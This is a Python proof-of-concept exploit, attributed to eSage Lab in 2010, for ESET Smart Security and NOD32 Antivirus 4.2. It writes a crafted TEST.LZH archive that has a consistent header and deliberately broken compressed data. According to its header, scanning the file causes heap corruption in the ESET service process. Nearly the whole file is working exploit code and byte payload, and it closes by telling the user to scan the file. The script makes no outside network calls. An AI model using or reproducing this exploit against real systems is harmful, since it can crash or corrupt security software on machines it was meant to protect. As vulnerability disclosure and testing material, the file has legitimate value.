# Title : ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit
# Published : 2010-05-07
# Author : Oleksiuk Dmitry, eSage Lab
#
# ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64)
# LZH archive parsing PoC exploit.
#
# Scanning the malicious file causes heap corruption in the context
# of the service process (ekrn.exe).
# See Dr. Watson log (drwtsn32.log) for details.
#
# USAGE: python eset_lzh.py (TEST.LZH will be created)
#
# (c) 2010 eSage Lab
# http://www.esagelab.com/
# support@esagelab.com
#
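"""Write the malformed LZH file used by the ESET 4.2 LZH-parsing PoC.

The script builds a single-entry LZH archive whose level-0 style header is
internally consistent (declared header size, checksum, compressed size and
file name all agree) while the payload that follows is deliberately broken.
Writing it to TEST.LZH reproduces the on-scan heap corruption described in
the header comment for the 2010 4.2 builds named there; whether later
builds are affected is not established by this file.  Nothing here scans or
sends anything -- it only creates the file in the current directory.

Runs unchanged under Python 2.6+ and Python 3: bytes literal, single-argument
print(), and a ``with`` statement are all common to both.
"""

# Header field labels follow the original author's annotations.  The
# arithmetic noted in the comments is checked by the accompanying test,
# not assumed.  The original listing had lost the backslashes of its
# ``\x`` escapes (e.g. "x21" for the header-size byte), which would have
# written ASCII text instead of the intended bytes; they are restored here.
data = (
    b"\x21"                            # header size: 33 bytes follow the checksum byte
    b"\x83"                            # checksum: sum of those 33 bytes mod 256
    b"-lh"                             # method id, opening part
    b"5"                               # method id digit (author: "LZW, Arithmetic Encoding")
    b"-"                               # method id, closing part
    b"\x13\x00\x00\x00"                # compressed size, little-endian: 19
    b"\x30\x00\x00\x00"                # uncompressed size, little-endian: 48
    b"\xFB\x3A\x6C\x3B"                # original file date/time (author's value, not decoded here)
    b"\x20\x01"                        # file attribute
    b"\x08"                            # file name length
    b"TEST.TXT"                        # file name
    # The 33 header bytes end 5 bytes into the next line (file offset 35),
    # so the remaining 19 bytes are exactly the declared compressed size.
    # The author flagged the whole line as "!!! broken LZW compressed data".
    b"\xDC\x41\x4D\x00\x00\x00\x0B\x33\x6D\x66\x49\x5D"
    b"\x23\x08\x8A\x78\x00\x00\xC0\x81\xA5\xC0\xD7\x20"
)

OUTPUT_NAME = "TEST.LZH"


def main():
    """Print the banner and write ``data`` to TEST.LZH in the current directory."""
    print("ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH File parsing PoC exploit")
    print("(c) 2010 eSage Lab")
    print("----------------------------")
    # ``with`` closes the handle even if the write raises; 'wb' keeps the
    # bytes exact (no newline translation) on every platform.
    with open(OUTPUT_NAME, "wb") as f:
        f.write(data)
    print("TEST.LZH (%d bytes) created" % len(data))
    print("Now try to scan it with antivirus")


# Guarding the write lets the module be imported (e.g. by a test) without
# creating the file; ``python eset_lzh.py`` behaves exactly as before.
if __name__ == "__main__":
    main()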